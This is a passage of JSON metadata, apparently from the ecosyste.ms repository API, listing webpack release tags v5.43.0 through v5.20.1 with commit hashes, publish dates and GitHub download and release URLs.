pack/tags/v5.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.43.0/manifests"},{"name":"v5.42.1","sha":"4156b20644d309c0e8acaa1e22ca3a4fe546c0b6","kind":"tag","published_at":"2021-07-05T14:05:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.42.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.1/manifests"},{"name":"v5.42.0","sha":"4fb45402eec7efe1c70e641cab7b24331948ea8d","kind":"tag","published_at":"2021-07-02T07:04:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.42.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.0/manifests"},{"name":"v5.41.1","sha":"9ed05afbeaf87442d86863a20a6c30b0ab437fb5","kind":"tag","published_at":"2021-06-29T14:30:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.41.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.1/manifests"},{"name":"v5.41.0","sha":"fd5dc9997671b4c4b32d15f722e06079cd5da2db","kind":"tag","published_at":"2021-06-28T16:23:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.41.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.0/manifests"},{"name":"v5.40.0","sha":"5d297327bc1f208de16c29f5c9b31d2b8a06bce4","kind":"tag","published_at":"2021-06-21T16:25:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.40.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.40.0/manifests"},{"name":"v5.39.1","sha":"e5ccd070f6c18794173d3f2e60445de5bc2f52a2","kind":"tag","published_at":"2021-06-17T10:21:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.39.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.1/manifests"},{"name":"v5.39.0","sha":"e9f90450d5d8b4e796e5e0e9674869220ab73bcb","kind":"tag","published_at":"2021-06-14T21:31:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.39.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.0/manifests"},{"name":"v5.38.1","sha":"487665cb69f7b1f1aac44097124ef8f33cfe247b","kind":"tag","published_at":"2021-05-27T21:12:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.38.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.1/manifests"},{"name":"v5.38.0","sha":"daa0f1ed1cebc28c8cc9034f95f3b56e9253ec5e","kind":"tag","published_at":"2021-05-27T12:41:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.38.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.0/manifests"},{"name":"v5.37.1","sha":"2a5ed4a2dcbe06e852f84a8e7f63145af87cb139","kind":"tag","published_at":"2021-05-19T06:50:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.37.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.1/manifests"},{"name":"v5.37.0","sha":"a5821c74568d59a330043900328a018c5d3a4af7","kind":"tag","published_at":"2021-05-10T16:21:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.37.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.0/manifests"},{"name":"v5.36.2","sha":"0e2e972a2d181c530bb7185278fe5cfc20724c22","kind":"tag","published_at":"2021-04-30T11:48:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.2/manifests"},{"name":"v5.36.1","sha":"e9de77aae42bd8f7d799a21dd16c98206cd170f6","kind":"tag","published_at":"2021-04-28T18:57:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.1/manifests"},{"name":"v5.36.0","sha":"c0a3394ae059ba30c90b7e84c3805dcfd918577d","kind":"tag","published_at":"2021-04-27T09:44:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.0/manifests"},{"name":"v5.35.1","sha":"ed175cd22f89eb9fecd0a70572a3fd0be028e77c","kind":"tag","published_at":"2021-04-23T18:36:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.35.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.1/manifests"},{"name":"v5.35.0","sha":"e05935f8969d873a20762767d348256e5ad8fb46","kind":"tag","published_at":"2021-04-21T06:37:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.35.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.0/manifests"},{"name":"v5.34.0","sha":"a52263b4537dc5bd954677fc884966b0c11114d4","kind":"tag","published_at":"2021-04-19T14:42:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.34.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.34.0/manifests"},{"name":"v5.33.2","sha":"93ce24d2dc40ee972a2ea5138f3c181563c913fd","kind":"tag","published_at":"2021-04-14T18:31:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.2/manifests"},{"name":"v5.33.1","sha":"7a7d3be25a3db94cb47923d122513726966025cf","kind":"tag","published_at":"2021-04-14T18:08:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.1/manifests"},{"name":"v5.33.0","sha":"7ee3bab88a5f38d4a6356baf93a8c9dfb901b9dc","kind":"tag","published_at":"2021-04-14T17:28:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.0/manifests"},{"name":"v5.32.0","sha":"932950550c85dce4efcaccd7116b4879bfd5f962","kind":"tag","published_at":"2021-04-12T18:54:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.32.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.32.0/manifests"},{"name":"v5.31.2","sha":"cde1b73e12eb8a77eb9ba42e7920c9ec5d29c2c9","kind":"tag","published_at":"2021-04-09T17:52:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.2/manifests"},{"name":"v5.31.1","sha":"34502650252c1f5e2b6e19f3d5afd1fac96f3ec4","kind":"tag","published_at":"2021-04-09T17:07:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.1/manifests"},{"name":"v5.31.0","sha":"b3e26cb5a81087c1b4eadb2e648eb01928c9b3be","kind":"tag","published_at":"2021-04-07T16:39:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.0/manifests"},{"name":"v5.30.0","sha":"f3dce69e9df5f778fb4850662b0f16f9fd9951d2","kind":"tag","published_at":"2021-04-01T18:45:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.30.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.30.0/manifests"},{"name":"v5.29.0","sha":"0522deb7618636b37acae64f5e3b581c7bbb8fca","kind":"tag","published_at":"2021-04-01T15:39:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.29.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.29.0/manifests"},{"name":"v5.28.0","sha":"15110ea6de0b53c93d697716d17037c41a3c0cd2","kind":"tag","published_at":"2021-03-24T12:35:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.28.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.28.0/manifests"},{"name":"v5.27.2","sha":"1c044bc75be02fcfe78eb6a291f2d107f8ac58eb","kind":"tag","published_at":"2021-03-22T14:40:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.2/manifests"},{"name":"v5.27.1","sha":"69d4e174b96f197ef5d9d8396edaa25178f22725","kind":"tag","published_at":"2021-03-20T19:39:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.1/manifests"},{"name":"v5.27.0","sha":"807e69d9647e8605daa815b6b24df8baebaa59b9","kind":"tag","published_at":"2021-03-19T16:46:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.0/manifests"},{"name":"v5.26.3","sha":"4ea8a435ace96cc6fe5c9b741bc14b68d75624a4","kind":"tag","published_at":"2021-03-17T13:38:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.3/manifests"},{"name":"v5.26.2","sha":"c67a73abbc3d3b333b31480bd7ac7a50e8b49e3e","kind":"tag","published_at":"2021-03-16T19:55:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.2/manifests"},{"name":"v5.26.1","sha":"ee09a9609bdebc25e52e785cef56f9698805599d","kind":"tag","published_at":"2021-03-16T14:13:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.1/manifests"},{"name":"v5.26.0","sha":"1def19ea8ab9921d1adaed30ba8f928badb133b5","kind":"tag","published_at":"2021-03-15T16:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.0/manifests"},{"name":"v5.25.1","sha":"58dfda2796edc57c9d18526053d6bcde6f06b8b7","kind":"tag","published_at":"2021-03-14T19:33:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.25.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.1/manifests"},{"name":"v5.25.0","sha":"be352e86b1c88893a62ffc2ada1c9294a016f5db","kind":"tag","published_at":"2021-03-12T07:49:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.25.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.0/manifests"},{"name":"v5.24.4","sha":"ef5e68141dc0fb6d02aa022194506cda878392c1","kind":"tag","published_at":"2021-03-08T09:56:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.4/manifests"},{"name":"v5.24.3","sha":"d044c857305fb48693bfa961bec3485d82ddef41","kind":"tag","published_at":"2021-03-03T19:07:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.3/manifests"},{"name":"v5.24.2","sha":"04a7d052b5c04628257ec23244f234622c7f394c","kind":"tag","published_at":"2021-02-24T20:20:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.2/manifests"},{"name":"v5.24.1","sha":"3849f45961c60d4bea91b4ef43bb7da7992a0c3a","kind":"tag","published_at":"2021-02-23T21:56:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.1/manifests"},{"name":"v5.24.0","sha":"63c14ccbfc6698cb974f8469e0a829ae1d8f44ec","kind":"tag","published_at":"2021-02-22T22:32:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.0/manifests"},{"name":"v5.23.0","sha":"7774d7ec632e66b8c6a8c0f320b3469e86ed5e26","kind":"tag","published_at":"2021-02-18T15:52:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.23.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.23.0/manifests"},{"name":"v5.22.0","sha":"f5bcac4a061897822bf10a8191231b5a71c59273","kind":"tag","published_at":"2021-02-15T09:00:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.22.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.22.0/manifests"},{"name":"v5.21.2","sha":"6661bd94fd724bb4610d348a1ffe48030dc56726","kind":"tag","published_at":"2021-02-07T18:27:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.2/manifests"},{"name":"v5.21.1","sha":"a1948fb2247adb5121ded5c3c4a04ed384b96c03","kind":"tag","published_at":"2021-02-06T09:39:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.1/manifests"},{"name":"v5.21.0","sha":"647aa17cc7fe16d382b3d48efc47258c4e96d699","kind":"tag","published_at":"2021-02-05T21:03:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.0/manifests"},{"name":"v5.20.2","sha":"f5a263750611f33adffb7644064b40b0432d6c65","kind":"tag","published_at":"2021-02-04T14:26:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.2/manifests"},{"name":"v5.20.1","sha":"82edd9150f8e54bab1497c9c29edc